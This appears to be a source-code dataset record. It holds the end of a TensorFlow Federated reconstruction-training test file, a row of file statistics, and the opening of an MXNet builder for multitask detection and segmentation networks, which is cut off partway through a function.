server_state, output = it_process.next(server_state, federated_data)
server_states.append(server_state)
outputs.append(output)
loss_list.append(output['loss'])
expected_keys = [
'sparse_categorical_accuracy', 'loss', 'num_examples', 'num_batches'
]
self.assertCountEqual(outputs[0].keys(), expected_keys)
self.assertNotAllClose(server_states[0].model.trainable,
server_states[1].model.trainable)
self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
self.assertEqual(outputs[0]['num_examples'], 6)
self.assertEqual(outputs[1]['num_batches'], 4)
self.assertEqual(outputs[0]['num_examples'], 6)
self.assertEqual(outputs[1]['num_batches'], 4)
def test_keras_eval_reconstruction(self):
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
it_process = training_process.build_federated_reconstruction_process(
local_recon_model_fn,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001),
evaluate_reconstruction=True)
server_state = it_process.initialize()
client_data = create_emnist_client_data()
federated_data = [client_data(), client_data()]
server_states = []
outputs = []
loss_list = []
for _ in range(5):
server_state, output = it_process.next(server_state, federated_data)
server_states.append(server_state)
outputs.append(output)
loss_list.append(output['loss'])
expected_keys = [
'sparse_categorical_accuracy', 'loss', 'num_examples', 'num_batches'
]
self.assertCountEqual(outputs[0].keys(), expected_keys)
self.assertNotAllClose(server_states[0].model.trainable,
server_states[1].model.trainable)
self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
self.assertEqual(outputs[0]['num_examples'], 12)
self.assertEqual(outputs[1]['num_batches'], 8)
self.assertEqual(outputs[0]['num_examples'], 12)
self.assertEqual(outputs[1]['num_batches'], 8)
def test_keras_eval_reconstruction_joint_training(self):
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
it_process = training_process.build_federated_reconstruction_process(
local_recon_model_fn,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001),
evaluate_reconstruction=True,
jointly_train_variables=True)
server_state = it_process.initialize()
client_data = create_emnist_client_data()
federated_data = [client_data(), client_data()]
server_states = []
outputs = []
loss_list = []
for _ in range(5):
server_state, output = it_process.next(server_state, federated_data)
server_states.append(server_state)
outputs.append(output)
loss_list.append(output['loss'])
expected_keys = [
'sparse_categorical_accuracy', 'loss', 'num_examples', 'num_batches'
]
self.assertCountEqual(outputs[0].keys(), expected_keys)
self.assertLess(np.mean(loss_list[2:]), np.mean(loss_list[:2]))
self.assertNotAllClose(server_states[0].model.trainable,
server_states[1].model.trainable)
self.assertEqual(outputs[0]['num_examples'], 12)
self.assertEqual(outputs[1]['num_batches'], 8)
self.assertEqual(outputs[0]['num_examples'], 12)
self.assertEqual(outputs[1]['num_batches'], 8)
def test_custom_model_no_recon(self):
client_data = create_emnist_client_data()
train_data = [client_data(batch_size=3), client_data(batch_size=3)]
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
# Disable reconstruction via 0 learning rate to ensure post-recon loss
# matches exact expectations round 0 and decreases by the next round.
trainer = training_process.build_federated_reconstruction_process(
MnistModel,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
server_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.01),
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.0))
state = trainer.initialize()
outputs = []
states = []
for _ in range(2):
state, output = trainer.next(state, train_data)
outputs.append(output)
states.append(state)
# All weights and biases are initialized to 0, so initial logits are all 0
# and softmax probabilities are uniform over 10 classes. So negative log
# likelihood is -ln(1/10). This is on expectation, so increase tolerance.
# Note that this only holds when our batch size is large enough so that
# clients only take a single training step.
self.assertAllClose(outputs[0]['loss'], tf.math.log(10.0), rtol=1e-4)
self.assertLess(outputs[1]['loss'], outputs[0]['loss'])
self.assertNotAllClose(states[0].model.trainable, states[1].model.trainable)
# Expect 6 reconstruction examples, 6 training examples. Only training
# included in metrics.
self.assertEqual(outputs[0]['num_examples'], 6.0)
self.assertEqual(outputs[1]['num_examples'], 6.0)
# Expect 2 reconstruction batches and 2 training batches. Only training
# included in metrics.
self.assertEqual(outputs[0]['num_batches'], 2.0)
self.assertEqual(outputs[1]['num_batches'], 2.0)
def test_custom_model_adagrad_server_optimizer(self):
client_data = create_emnist_client_data()
train_data = [client_data(), client_data()]
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
# Disable reconstruction via 0 learning rate to ensure post-recon loss
# matches exact expectations round 0 and decreases by the next round.
trainer = training_process.build_federated_reconstruction_process(
MnistModel,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
server_optimizer_fn=functools.partial(tf.keras.optimizers.Adagrad,
0.01),
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.0))
state = trainer.initialize()
outputs = []
states = []
for _ in range(2):
state, output = trainer.next(state, train_data)
outputs.append(output)
states.append(state)
# All weights and biases are initialized to 0, so initial logits are all 0
# and softmax probabilities are uniform over 10 classes. So negative log
# likelihood is -ln(1/10). This is on expectation, so increase tolerance.
self.assertAllClose(outputs[0]['loss'], tf.math.log(10.0), atol=1e-3)
self.assertLess(outputs[1]['loss'], outputs[0]['loss'])
self.assertNotAllClose(states[0].model.trainable, states[1].model.trainable)
# Expect 6 reconstruction examples, 6 training examples. Only training
# included in metrics.
self.assertEqual(outputs[0]['num_examples'], 6.0)
self.assertEqual(outputs[1]['num_examples'], 6.0)
# Expect 4 reconstruction batches and 4 training batches. Only training
# included in metrics.
self.assertEqual(outputs[0]['num_batches'], 4.0)
self.assertEqual(outputs[1]['num_batches'], 4.0)
def test_custom_model_zeroing_clipping_aggregator_factory(self):
client_data = create_emnist_client_data()
train_data = [client_data(), client_data()]
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
# No values should be clipped and zeroed
aggregation_factory = tff.aggregators.zeroing_factory(
zeroing_norm=float('inf'),
inner_agg_factory=tff.aggregators.MeanFactory())
# Disable reconstruction via 0 learning rate to ensure post-recon loss
# matches exact expectations round 0 and decreases by the next round.
trainer = training_process.build_federated_reconstruction_process(
MnistModel,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
server_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.01),
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.0),
aggregation_factory=aggregation_factory,
)
state = trainer.initialize()
outputs = []
states = []
for _ in range(2):
state, output = trainer.next(state, train_data)
outputs.append(output)
states.append(state)
# All weights and biases are initialized to 0, so initial logits are all 0
# and softmax probabilities are uniform over 10 classes. So negative log
# likelihood is -ln(1/10). This is on expectation, so increase tolerance.
self.assertAllClose(outputs[0]['loss'], tf.math.log(10.0), atol=1e-3)
self.assertLess(outputs[1]['loss'], outputs[0]['loss'])
self.assertNotAllClose(states[0].model.trainable, states[1].model.trainable)
# Expect 6 reconstruction examples, 6 training examples. Only training
# included in metrics.
self.assertEqual(outputs[0]['num_examples'], 6.0)
self.assertEqual(outputs[1]['num_examples'], 6.0)
# Expect 4 reconstruction batches and 4 training batches. Only training
# included in metrics.
self.assertEqual(outputs[0]['num_batches'], 4.0)
self.assertEqual(outputs[1]['num_batches'], 4.0)
def test_iterative_process_builds_with_dp_agg_and_client_weight_fn(self):
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
# No values should be changed, but working with inf directly zeroes out all
# updates. Preferring very large value, but one that can be handled in
# multiplication/division
gaussian_sum_query = tfp.GaussianSumQuery(l2_norm_clip=1e10, stddev=0)
dp_sum_factory = tff.aggregators.DifferentiallyPrivateFactory(
query=gaussian_sum_query,
record_aggregation_factory=tff.aggregators.SumFactory())
dp_mean_factory = _DPMean(dp_sum_factory)
def client_weight_fn(local_outputs):
del local_outputs # Unused
return 1.0
# Ensure this builds, as some builders raise if an unweighted aggregation is
# specified with a client_weight_fn.
trainer = training_process.build_federated_reconstruction_process(
MnistModel,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
server_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.01),
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.0),
aggregation_factory=dp_mean_factory,
client_weight_fn=client_weight_fn,
)
self.assertIsInstance(trainer, tff.templates.IterativeProcess)
def test_execution_with_custom_dp_query(self):
client_data = create_emnist_client_data()
train_data = [client_data(), client_data()]
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
# No values should be changed, but working with inf directly zeroes out all
# updates. Preferring very large value, but one that can be handled in
# multiplication/division
gaussian_sum_query = tfp.GaussianSumQuery(l2_norm_clip=1e10, stddev=0)
dp_sum_factory = tff.aggregators.DifferentiallyPrivateFactory(
query=gaussian_sum_query,
record_aggregation_factory=tff.aggregators.SumFactory())
dp_mean_factory = _DPMean(dp_sum_factory)
# Disable reconstruction via 0 learning rate to ensure post-recon loss
# matches exact expectations round 0 and decreases by the next round.
trainer = training_process.build_federated_reconstruction_process(
MnistModel,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
server_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.01),
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.0),
aggregation_factory=dp_mean_factory,
)
state = trainer.initialize()
outputs = []
states = []
for _ in range(2):
state, output = trainer.next(state, train_data)
outputs.append(output)
states.append(state)
# All weights and biases are initialized to 0, so initial logits are all 0
# and softmax probabilities are uniform over 10 classes. So negative log
# likelihood is -ln(1/10). This is on expectation, so increase tolerance.
self.assertAllClose(outputs[0]['loss'], tf.math.log(10.0), atol=1e-3)
self.assertLess(outputs[1]['loss'], outputs[0]['loss'])
self.assertNotAllClose(states[0].model.trainable, states[1].model.trainable)
# Expect 6 reconstruction examples, 6 training examples. Only training
# included in metrics.
self.assertEqual(outputs[0]['num_examples'], 6.0)
self.assertEqual(outputs[1]['num_examples'], 6.0)
# Expect 4 reconstruction batches and 4 training batches. Only training
# included in metrics.
self.assertEqual(outputs[0]['num_batches'], 4.0)
self.assertEqual(outputs[1]['num_batches'], 4.0)
def test_custom_model_eval_reconstruction_multiple_epochs(self):
client_data = create_emnist_client_data()
train_data = [client_data(), client_data()]
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
dataset_split_fn = reconstruction_utils.build_dataset_split_fn(
recon_epochs_max=3,
recon_epochs_constant=False,
post_recon_epochs=4,
post_recon_steps_max=3)
trainer = training_process.build_federated_reconstruction_process(
MnistModel,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001),
evaluate_reconstruction=True,
dataset_split_fn=dataset_split_fn)
state = trainer.initialize()
outputs = []
states = []
for _ in range(2):
state, output = trainer.next(state, train_data)
outputs.append(output)
states.append(state)
self.assertLess(outputs[1]['loss'], outputs[0]['loss'])
self.assertNotAllClose(states[0].model.trainable, states[1].model.trainable)
# Expect 6 reconstruction examples, 10 training examples.
self.assertEqual(outputs[0]['num_examples'], 16.0)
# Expect 12 reconstruction examples, 10 training examples.
self.assertEqual(outputs[1]['num_examples'], 22.0)
# Expect 4 reconstruction batches and 6 training batches.
self.assertEqual(outputs[0]['num_batches'], 10.0)
# Expect 8 reconstruction batches and 6 training batches.
self.assertEqual(outputs[1]['num_batches'], 14.0)
def test_custom_model_eval_reconstruction_split_multiple_epochs(self):
client_data = create_emnist_client_data()
# 3 batches per user, each with one example. Since data will be split for
# each user, each user will have 2 unique recon examples, and 1 unique
# post-recon example (even-indices are allocated to recon during splitting).
train_data = [client_data(batch_size=1), client_data(batch_size=1)]
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
dataset_split_fn = reconstruction_utils.build_dataset_split_fn(
recon_epochs_max=3, split_dataset=True, post_recon_epochs=5)
trainer = training_process.build_federated_reconstruction_process(
MnistModel,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
evaluate_reconstruction=True,
dataset_split_fn=dataset_split_fn)
state = trainer.initialize()
outputs = []
states = []
for _ in range(2):
state, output = trainer.next(state, train_data)
outputs.append(output)
states.append(state)
self.assertLess(outputs[1]['loss'], outputs[0]['loss'])
self.assertNotAllClose(states[0].model.trainable, states[1].model.trainable)
# Expect 12 reconstruction examples, 10 training examples.
self.assertEqual(outputs[0]['num_examples'], 22.0)
self.assertEqual(outputs[1]['num_examples'], 22.0)
# Expect 12 reconstruction batches and 10 training batches.
self.assertEqual(outputs[0]['num_batches'], 22.0)
self.assertEqual(outputs[1]['num_batches'], 22.0)
def test_custom_model_eval_reconstruction_disable_post_recon(self):
"""Ensures we can disable post-recon on a client via custom `DatasetSplitFn`."""
client_data = create_emnist_client_data()
train_data = [client_data(batch_size=3), client_data(batch_size=2)]
def loss_fn():
return tf.keras.losses.SparseCategoricalCrossentropy()
def metrics_fn():
return [
tff.learning.metrics.NumExamplesCounter(),
tff.learning.metrics.NumBatchesCounter(),
tf.keras.metrics.SparseCategoricalAccuracy()
]
def dataset_split_fn(client_dataset, round_num):
del round_num
recon_dataset = client_dataset.repeat(2)
# One user gets 1 batch with 1 example, the other user gets 0 batches.
post_recon_dataset = client_dataset.skip(1)
return recon_dataset, post_recon_dataset
trainer = training_process.build_federated_reconstruction_process(
MnistModel,
loss_fn=loss_fn,
metrics_fn=metrics_fn,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
evaluate_reconstruction=True,
jointly_train_variables=True,
dataset_split_fn=dataset_split_fn)
state = trainer.initialize()
outputs = []
states = []
for _ in range(2):
state, output = trainer.next(state, train_data)
outputs.append(output)
states.append(state)
# One client should still have a delta that updates the global weights, so
# there should be a change in the server state and loss should still
# decrease.
self.assertLess(outputs[1]['loss'], outputs[0]['loss'])
self.assertNotAllClose(states[0].model.trainable, states[1].model.trainable)
# Expect 12 reconstruction examples, 1 training examples.
self.assertEqual(outputs[0]['num_examples'], 13.0)
self.assertEqual(outputs[1]['num_examples'], 13.0)
# Expect 6 reconstruction batches and 1 training batches.
self.assertEqual(outputs[0]['num_batches'], 7.0)
self.assertEqual(outputs[1]['num_batches'], 7.0)
def test_get_model_weights(self):
client_data = create_emnist_client_data()
federated_data = [client_data()]
it_process = training_process.build_federated_reconstruction_process(
local_recon_model_fn,
loss_fn=tf.keras.losses.SparseCategoricalCrossentropy,
client_optimizer_fn=functools.partial(tf.keras.optimizers.SGD, 0.001),
reconstruction_optimizer_fn=functools.partial(tf.keras.optimizers.SGD,
0.001))
state = it_process.initialize()
self.assertIsInstance(
it_process.get_model_weights(state), tff.learning.ModelWeights)
self.assertAllClose(state.model.trainable,
it_process.get_model_weights(state).trainable)
for _ in range(3):
state, _ = it_process.next(state, federated_data)
self.assertIsInstance(
it_process.get_model_weights(state), tff.learning.ModelWeights)
self.assertAllClose(state.model.trainable,
it_process.get_model_weights(state).trainable)
if __name__ == '__main__':
tf.test.main()
| 37.97546
| 84
| 0.688718
| 4,489
| 37,140
| 5.461573
| 0.089107
| 0.020843
| 0.043072
| 0.044051
| 0.803443
| 0.796468
| 0.78366
| 0.765306
| 0.758902
| 0.742709
| 0
| 0.019581
| 0.207943
| 37,140
| 977
| 85
| 38.01433
| 0.813849
| 0.125848
| 0
| 0.734266
| 0
| 0
| 0.031313
| 0.005471
| 0
| 0
| 0
| 0
| 0.135664
| 1
| 0.099301
| false
| 0.001399
| 0.015385
| 0.057343
| 0.193007
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2224664a7c3b4e619986dec9d26540777519f5a9
| 39,794
|
py
|
Python
|
symbol/multitask_symbol_builder.py
|
ChunGaoY/DSPnet
|
8fad61059d85ad0cd1f7790c37b5e0478dccb158
|
[
"MIT"
] | 33
|
2018-04-18T06:52:16.000Z
|
2021-09-26T20:57:56.000Z
|
symbol/multitask_symbol_builder.py
|
ChunGaoY/DSPnet
|
8fad61059d85ad0cd1f7790c37b5e0478dccb158
|
[
"MIT"
] | 4
|
2018-07-09T07:09:15.000Z
|
2020-04-12T12:43:36.000Z
|
symbol/multitask_symbol_builder.py
|
liangfu/dspnet
|
8fad61059d85ad0cd1f7790c37b5e0478dccb158
|
[
"MIT"
] | 10
|
2018-04-19T08:17:01.000Z
|
2021-09-26T20:57:57.000Z
|
import mxnet as mx
from common import multi_layer_feature, multibox_layer, multitask_layer
from symbol.resnet import residual_unit
eps = 2e-5
use_global_stats = False
seg_classes = 19
def import_module(module_name):
"""Helper function to import module"""
import sys, os
import importlib
sys.path.append(os.path.dirname(__file__))
return importlib.import_module(module_name)
#------------------------------------------------------------------
# SINGLE TASK: DETECTION + DEPTH ESTIMATION
#------------------------------------------------------------------
def get_det_symbol_train(network, num_classes, from_layers, num_filters, strides, pads,
sizes, ratios, normalizations=-1, steps=[], min_filter=128,
nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
"""Build network symbol for training SSD
Parameters
----------
network : str
base network symbol name
num_classes : int
number of object classes not including background
from_layers : list of str
feature extraction layers, use '' for add extra layers
For example:
from_layers = ['relu4_3', 'fc7', '', '', '', '']
which means extract feature from relu4_3 and fc7, adding 4 extra layers
on top of fc7
num_filters : list of int
number of filters for extra layers, you can use -1 for extracted features,
however, if normalization and scale is applied, the number of filter for
that layer must be provided.
For example:
num_filters = [512, -1, 512, 256, 256, 256]
strides : list of int
strides for the 3x3 convolution appended, -1 can be used for extracted
feature layers
pads : list of int
paddings for the 3x3 convolution, -1 can be used for extracted layers
sizes : list or list of list
[min_size, max_size] for all layers or [[], [], []...] for specific layers
ratios : list or list of list
[ratio1, ratio2...] for all layers or [[], [], ...] for specific layers
normalizations : int or list of int
use normalizations value for all layers or [...] for specific layers,
-1 indicate no normalizations and scales
steps : list
specify steps for each MultiBoxPrior layer, leave empty, it will calculate
according to layer dimensions
min_filter : int
minimum number of filters used in 1x1 convolution
nms_thresh : float
non-maximum suppression threshold
force_suppress : boolean
whether suppress different class objects
nms_topk : int
apply NMS to top K detections
Returns
-------
mx.Symbol
"""
label = mx.sym.Variable('label_det')
body = import_module(network).get_symbol(num_classes, **kwargs)
internals = body.get_internals()
data = internals['data']
res3 = internals[from_layers[0]+"_output"]
res4 = internals[from_layers[1]+"_output"]
conv_feat = internals[from_layers[2]+"_output"]
### remove res3 from input layer of SSD
from_layers=from_layers[1:]
num_filters=num_filters[1:]
strides=strides[1:]
pads=pads[1:]
sizes=sizes[1:]
ratios=ratios[1:]
layers = multi_layer_feature(body, from_layers, num_filters, strides, pads,
min_filter=min_filter)
loc_preds, cls_preds, anchor_boxes = multitask_layer(layers, \
num_classes, sizes=sizes, ratios=ratios, normalization=normalizations, \
num_channels=num_filters, clip=False, interm_layer=0, steps=steps)
tmp = mx.contrib.symbol.MultiBoxTarget(
*[anchor_boxes, label, cls_preds], overlap_threshold=.5, \
ignore_label=-1, negative_mining_ratio=3, minimum_negative_samples=0, \
negative_mining_thresh=.5, variances=(0.1, 0.1, 0.2, 0.2),
name="multibox_target")
loc_target = tmp[0]
loc_target_mask = tmp[1]
cls_target = tmp[2]
cls_prob = mx.symbol.SoftmaxOutput(data=cls_preds, label=cls_target, \
ignore_label=-1, use_ignore=True, grad_scale=1., multi_output=True, \
normalization='valid', name="cls_prob")
loc_loss_ = mx.symbol.smooth_l1(name="loc_loss_", \
data=loc_target_mask * (loc_preds - loc_target), scalar=1.0)
loc_loss = mx.symbol.MakeLoss(loc_loss_, grad_scale=1., \
normalization='valid', name="loc_loss")
# monitoring training status
cls_label = mx.symbol.MakeLoss(data=cls_target, grad_scale=0, name="cls_label")
det = mx.contrib.symbol.MultiBoxDetection(*[cls_prob, loc_preds, anchor_boxes], \
name="detection", nms_threshold=nms_thresh, force_suppress=force_suppress,
variances=(0.1, 0.1, 0.2, 0.2), nms_topk=nms_topk)
det = mx.symbol.MakeLoss(data=det, grad_scale=0, name="det_out")
# group output
out = mx.symbol.Group([cls_prob, loc_loss, cls_label, det])
return out
def get_det_symbol(network, num_classes, from_layers, num_filters, sizes, ratios,
strides, pads, normalizations=-1, steps=[], min_filter=128,
nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
"""Build network for testing SSD
Parameters
----------
network : str
base network symbol name
num_classes : int
number of object classes not including background
from_layers : list of str
feature extraction layers, use '' for add extra layers
For example:
from_layers = ['relu4_3', 'fc7', '', '', '', '']
which means extract feature from relu4_3 and fc7, adding 4 extra layers
on top of fc7
num_filters : list of int
number of filters for extra layers, you can use -1 for extracted features,
however, if normalization and scale is applied, the number of filter for
that layer must be provided.
For example:
num_filters = [512, -1, 512, 256, 256, 256]
strides : list of int
strides for the 3x3 convolution appended, -1 can be used for extracted
feature layers
pads : list of int
paddings for the 3x3 convolution, -1 can be used for extracted layers
sizes : list or list of list
[min_size, max_size] for all layers or [[], [], []...] for specific layers
ratios : list or list of list
[ratio1, ratio2...] for all layers or [[], [], ...] for specific layers
normalizations : int or list of int
use normalizations value for all layers or [...] for specific layers,
-1 indicate no normalizations and scales
steps : list
specify steps for each MultiBoxPrior layer, leave empty, it will calculate
according to layer dimensions
min_filter : int
minimum number of filters used in 1x1 convolution
nms_thresh : float
non-maximum suppression threshold
force_suppress : boolean
whether suppress different class objects
nms_topk : int
apply NMS to top K detections
Returns
-------
mx.Symbol
"""
body = import_module(network).get_symbol(num_classes, **kwargs)
internals = body.get_internals()
data = internals['data']
res3 = internals[from_layers[0]+"_output"]
res4 = internals[from_layers[1]+"_output"]
conv_feat = internals[from_layers[2]+"_output"]
### remove res3 from input layer of SSD
from_layers=from_layers[1:]
num_filters=num_filters[1:]
strides=strides[1:]
pads=pads[1:]
sizes=sizes[1:]
ratios=ratios[1:]
layers = multi_layer_feature(body, from_layers, num_filters, strides, pads,
min_filter=min_filter)
loc_preds, cls_preds, anchor_boxes = multitask_layer(layers, \
num_classes, sizes=sizes, ratios=ratios, normalization=normalizations, \
num_channels=num_filters, clip=False, interm_layer=0, steps=steps)
cls_prob = mx.symbol.SoftmaxActivation(data=cls_preds, mode='channel', \
name='cls_prob')
det = mx.contrib.symbol.MultiBoxDetection(*[cls_prob, loc_preds, anchor_boxes], \
name="detection", nms_threshold=nms_thresh, force_suppress=force_suppress, \
variances=(0.1, 0.1, 0.2, 0.2), nms_topk=nms_topk)
# group output
out = mx.symbol.Group([det])
return out
#------------------------------------------------------------------
# SINGLE TASK: SEGMENTATION
#------------------------------------------------------------------
def get_seg_symbol_train(network, num_classes, from_layers, num_filters, strides, pads,
sizes, ratios, normalizations=-1, steps=[], min_filter=128,
nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
"""Build network symbol for training SSD
Parameters
----------
network : str
base network symbol name
num_classes : int
number of object classes not including background
from_layers : list of str
feature extraction layers, use '' for add extra layers
For example:
from_layers = ['relu4_3', 'fc7', '', '', '', '']
which means extract feature from relu4_3 and fc7, adding 4 extra layers
on top of fc7
num_filters : list of int
number of filters for extra layers, you can use -1 for extracted features,
however, if normalization and scale is applied, the number of filter for
that layer must be provided.
For example:
num_filters = [512, -1, 512, 256, 256, 256]
strides : list of int
strides for the 3x3 convolution appended, -1 can be used for extracted
feature layers
pads : list of int
paddings for the 3x3 convolution, -1 can be used for extracted layers
sizes : list or list of list
[min_size, max_size] for all layers or [[], [], []...] for specific layers
ratios : list or list of list
[ratio1, ratio2...] for all layers or [[], [], ...] for specific layers
normalizations : int or list of int
use normalizations value for all layers or [...] for specific layers,
-1 indicate no normalizations and scales
steps : list
specify steps for each MultiBoxPrior layer, leave empty, it will calculate
according to layer dimensions
min_filter : int
minimum number of filters used in 1x1 convolution
nms_thresh : float
non-maximum suppression threshold
force_suppress : boolean
whether suppress different class objects
nms_topk : int
apply NMS to top K detections
Returns
-------
mx.Symbol
"""
# label = mx.sym.Variable('label_det')
body = import_module(network).get_symbol(num_classes, **kwargs)
internals = body.get_internals()
data = internals['data']
res3 = internals[from_layers[0]+"_output"]
res4 = internals[from_layers[1]+"_output"]
conv_feat = internals[from_layers[2]+"_output"]
# segmentation task (pyramid pooling module)
res3_block = mx.sym.BlockGrad(data=res3, name="res3_block")
res3_reduced = mx.sym.Convolution(data=res3_block, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=128, no_bias=True, workspace=1024, name="res3_reduced")
res3_reduced_bn = mx.sym.BatchNorm(data=res3_reduced, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res3_reduced_bn')
res3_reduced2 = mx.sym.Convolution(data=res3_reduced_bn, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=128, no_bias=True, workspace=1024, name="res3_reduced2")
res3_reduced2_bn = mx.sym.BatchNorm(data=res3_reduced2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res3_reduced2_bn')
res4_block = mx.sym.BlockGrad(data=res4, name="res4_block")
res4_reduced = mx.sym.Convolution(data=res4_block, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=256, no_bias=True, workspace=1024, name="res4_reduced")
res4_reduced_bn = mx.sym.BatchNorm(data=res4_reduced, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res4_reduced_bn')
res4_reduced2 = mx.sym.Convolution(data=res4_reduced_bn, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=256, no_bias=True, workspace=1024, name="res4_reduced2")
res4_reduced2_bn = mx.sym.BatchNorm(data=res4_reduced2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res4_reduced2_bn')
res5_reduced = mx.symbol.Convolution(data=conv_feat, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=512, no_bias=True, workspace=1024, name="res5_reduced")
res5_reduced_bn = mx.sym.BatchNorm(data=conv_feat, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res5_reduced_bn')
score_pool1 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(1,1), stride=(1,1), pad=(0,0), pool_type='avg', name='score_pool1')
score_pool2 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(2,2), stride=(2,2), pad=(0,0), pool_type='avg', name='score_pool2')
score_pool4 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(4,4), stride=(4,4), pad=(0,0), pool_type='avg', name='score_pool4')
score2_pool4 = mx.symbol.Convolution(data=score_pool4, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=128, no_bias=True, workspace=1024, name="score2_pool4")
score2_pool4_bn = mx.sym.BatchNorm(data=score2_pool4, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool4_bn')
score2_pool2 = mx.symbol.Convolution(data=score_pool2, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=256, no_bias=True, workspace=1024, name="score2_pool2")
score2_pool2_bn = mx.sym.BatchNorm(data=score2_pool2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool2_bn')
score2_pool1 = mx.symbol.Convolution(data=score_pool1, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=512, no_bias=True, workspace=1024, name="score2_pool1")
score2_pool1_bn = mx.sym.BatchNorm(data=score2_pool1, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool1_bn')
affine_matrix = mx.sym.var("affine_matrix", shape=(1,6))
grid = mx.sym.GridGenerator(data=affine_matrix, transform_type='affine', target_shape=(64, 128))
score3_samp4 = mx.sym.BilinearSampler(data=score2_pool4_bn, grid=grid, name='score3_samp4')
